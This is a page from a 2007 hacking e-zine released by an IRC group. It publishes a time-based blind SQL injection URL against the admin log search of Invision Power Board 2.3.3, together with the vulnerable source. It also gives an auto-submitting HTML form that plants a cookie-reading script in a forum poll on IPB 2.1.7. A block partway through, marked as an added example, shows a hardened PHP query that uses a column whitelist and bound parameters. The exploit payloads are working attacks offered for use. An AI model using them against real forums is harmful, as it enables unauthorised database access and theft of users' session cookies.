Channel: #TGBR, #hack-psihoz, Server: irc.dalnet.ru, Port: 6667
TGBR E-ZineS #1:
IPB <= 2.3.3 SQL injection:
Code:
```
------------- adminlogs.php -------------
BUG FOUND: perdimonokl aka 4nob1oz
BUG FOUND DATE: 24/11/2007
BUG DISCOVERED DATE: NOT YET

/*
 * VULN FUNCTION
 * ----------------
 *
 * function view()
 *
 * ----------------
 * VULN CODE
 *
 * ----------------------------------------------------------------------------------------
 * else
 * {
 *     $this->ipsclass->input['search_string'] = urldecode($this->ipsclass->input['search_string']);
 *
 *     $dbq = "m.".$this->ipsclass->input['search_type']." LIKE '%".$this->ipsclass->input['search_string']."%'";
 *
 *     $row = $this->ipsclass->DB->build_and_exec_query( array( 'select' => 'COUNT(m.id) as count', 'from' => 'admin_logs m', 'where' => $dbq ) );
 *
 *     $row_count = $row['count'];
 *
 *     $query = "&act=adminlog&code=view&search_type={$this->ipsclass->input['search_type']}&search_string=".urlencode($this->ipsclass->input['search_string']);
 *
 *     $this->ipsclass->DB->cache_add_query( 'adminlogs_view_two', array( 'dbq' => $dbq, 'limit_a' => $start ) );
 *     $this->ipsclass->DB->cache_exec_query();
 * }
 *
 * ----------------------------------------------------------------------------------------
 */

EXPLOIT
-------
adsess=85f93b41dd3244e5680f5085b28b56bf ---> When you login to the admin panel you open an admin session and you can see it in the variable "adsess="
Replace the "adsess=" in the URL with your own

http://localhost/forum/admin/index.php?adsess=85f93b41dd3244e5680f5085b28b56bf&section=admin&act=adminlog&code=view&act=adminlog&section=admin&search_string=333&search_type=act+and+1=if(substring(version(),1,1)=5,1,benchmark(999999,md5(now())))--
```
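The query above concatenates `search_type` and `search_string` straight into the WHERE clause, so a crafted `search_type` becomes part of the SQL. As an added example (not IPB's code and not the vendor's fix), here is the same count query written so that the column name is taken from a fixed list and the search value is a bound parameter; the column names and the connection details are assumptions.

```php
<?php
// Added example, not Invision Power Board code: a hardened version of the
// adminlog search count. Identifiers cannot be bound in a prepared statement,
// so the column comes from a whitelist; the search value is bound as data.

// Assumed searchable columns of admin_logs (not taken from the page).
const ADMIN_LOG_SEARCH_COLUMNS = ['act', 'member_id', 'ip_address', 'note'];

function count_admin_logs(mysqli $db, string $search_type, string $search_string): int
{
    // 1. Reject any search_type that is not a known column name.
    //    "act and 1=if(...)" never reaches the SQL text.
    if (!in_array($search_type, ADMIN_LOG_SEARCH_COLUMNS, true)) {
        throw new InvalidArgumentException('unknown search_type');
    }

    // 2. Escape LIKE metacharacters so '%' and '_' in user input match literally.
    $pattern = '%' . addcslashes($search_string, '%_\\') . '%';

    // 3. The value is a bound parameter; the only interpolated piece is the
    //    whitelisted column, quoted with backticks.
    $stmt = $db->prepare(
        "SELECT COUNT(m.id) AS count FROM admin_logs m WHERE m.`$search_type` LIKE ?"
    );
    $stmt->bind_param('s', $pattern);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    return (int) $row['count'];
}

// Usage with assumed connection parameters:
// $db = new mysqli('localhost', 'ipb', 'secret', 'forum');
// echo count_admin_logs($db, 'act', $_GET['search_string'] ?? '');
// A search_type that is not in the whitelist raises InvalidArgumentException
// instead of being executed by MySQL.
```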
XSS#2
Code:
```html
<body onload="preview.submit();">
<center>
<form id='postingform' action="http://САЙТ_ФОРУМ_ipb.2.1.7/index.php?act=post&do=new_post&f=НОМЕР_ТЕМЫ" method="post" name="preview">
<input type="hidden" name="st" size="30" tabindex="3" maxlength="300" value='0'>
<input type="hidden" name="act" size="30" tabindex="3" maxlength="300" value='Post'>
<input type="hidden" name="s" size="30" tabindex="3" maxlength="300" value=''>
<input type="hidden" name="TopicTitle" size="30" tabindex="3" maxlength="300" value='tttttttttt1'>
<input type="hidden" name="TopicDesc" size="30" tabindex="3" maxlength="300" value='tttttttttt2'>
<input type="hidden" name="poll_question" size="30" tabindex="3" maxlength="300" value='tttttttttt3'>
<input type="hidden" name="question[1]" size="30" tabindex="3" maxlength="300" value='</script><script>alert(document.cookie)</script><script>'>
<input type="hidden" name="Post" size="30" tabindex="3" maxlength="300" value='textatatatatatatatata'>
<input type="hidden" name="enableemo" size="30" tabindex="3" maxlength="300" value='yes'>
<input type="hidden" name="enablesig" size="30" tabindex="3" maxlength="300" value='yes'>
<input type="hidden" name="mod_options" size="30" tabindex="3" maxlength="300" value='nowt'>
<input type="hidden" name="iconid" size="30" tabindex="3" maxlength="300" value='0'>
<input type="hidden" name="preview" size="30" tabindex="3" maxlength="300" value='Предварительный просмотр'>
</form>
</center>
</body>
```
Created by TGBR Community
All Rights Reserved. Trash 2007 ©